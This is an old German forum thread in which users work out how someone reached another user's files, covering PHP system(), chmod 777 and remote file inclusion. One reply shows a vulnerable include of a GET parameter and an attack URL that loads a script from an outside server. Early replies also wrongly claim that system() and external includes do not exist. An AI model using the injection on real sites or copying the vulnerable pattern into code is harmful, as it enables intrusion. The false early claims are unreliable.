system(), include und linux: keinen plan

**Samson2k** · 12.10.2003, 16:42

Es gibt keine system() Befehl...weder in Linux noch in PHP.

Das könnte viele Ursachen haben aber mit Linux hat das 100%ig nix zu tun. Linux ist nicht der Webserver. Wenn dann hast du schlechte Zugriffsrechte in deinen Webordnern gesetzt, oder du hast nen FTP-Server laufen und kein richtiges Passwort.

Aber solange deine Scripte laufen (und in <?php ?> stehn) kann man von aussen nicht drankommen...
Auf jeden Fall hat dein Bekannter keinen Plan von Linux und versucht dich aufn Arm zu nehmen

Übrigens gibts keinen extrenen include() Befehl

extern is von ausserhalb und man kann kein PHP Script von ausserhalb einbinden, egal was dieser Kerl auch erzählt

**Bigzed** · 12.10.2003, 17:12

Doch die funktion gibt es!
http://de3.php.net/manual/de/function.system.php

Ich habe meine CHMODS auf 777 gesetzt, heißt das vieleicht das auch andere auf meine Dateien zugreifen können? Dann liegt da warscheinlich der fehler.

Bei externem include habe ich mich auch seehr gewundert, vieleicht habe ich ihn auch falsch verstanden.

Warscheilnich sind die CHMODS daran schuld oder? Und die gibts ja auch nur bei Linux, vieleicht meinte er das damit.

**Samson2k** · 12.10.2003, 17:29

Komisch im PHP Handbuch gibts keinen Befehl system()

Tut soweit ich das jetzt gelesen hab aber nix anderes als exec()...

Und der muss ne Datei auf deinem System ham damit der den Befehl ausführen kann. Und das hat er ja hoffentlich nicht, also kann er diesen Befehl nicht benutzt haben, zumal der Befehl wirklich nich üblich ist. Normal benutzt man zu Programmaufrufen exec....

**Bigzed** · 13.10.2003, 01:47

Nein hat er nicht und er konnte auf meine Dateien zugreifen!!!

Da muss es irgendwas geben. Er meinte es hätte was mit include() zu tun da sollte ich nur lokale Dateien includen, sonst könnte er das machen!

**Samson2k** · 13.10.2003, 10:35

Konnte er nicht, zumindest nicht mit PHP...
Wenn du deinen Server nicht abgesichert hast und er sich einlogen konnte hat das nix mit include zu tun...

**TBT** · 13.10.2003, 11:55

Original geschrieben von Samson2k
Konnte er nicht, zumindest nicht mit PHP...
Wenn du deinen Server nicht abgesichert hast und er sich einlogen konnte hat das nix mit include zu tun...

na aber ganz sicher !
und das funktioniert genau mit include!

Beispiel:

PHP-Code:


// schlechte Seite

include($HTTP_GET_VARS['modul'].'.php');

Aufruf der Seite:

index.php?modul=falle

böser Aufruf:
index.php?modul=http://meinserver/meinboesesscript

mein böses Script macht dann ein

PHP-Code:


echo "echo fread('index.php');";

und zeigt mir somit das ganze Script index.php an

**Samson2k** · 13.10.2003, 14:57

Ja aber ich denke das niemand so leichtsinnig ist

**TBT** · 13.10.2003, 15:15

... das denkst aber nur du!

Wir haben hier schon öfters Scripte "auseinander" genommen, die
genau so gearbeitet haben.

**Bigzed** · 13.10.2003, 20:50

ohje das wird es wohl sein.

das heißt rein theoretisch konnte er auch auf meinem server schreiben...

Und was hat das ganze jetzt mit linux und system() zu tun????

**Samson2k** · 14.10.2003, 11:46

überhaupt nix...so schlecht programmierte Scripte gehn auf jedem OS. Obwohl ich noch nie eins gesehn hab das so leichtsinnig war...

Theoretisch könnte er den system() Befehl einfügen und beliebige Kommandos eingeben.

system(), include und linux: keinen plan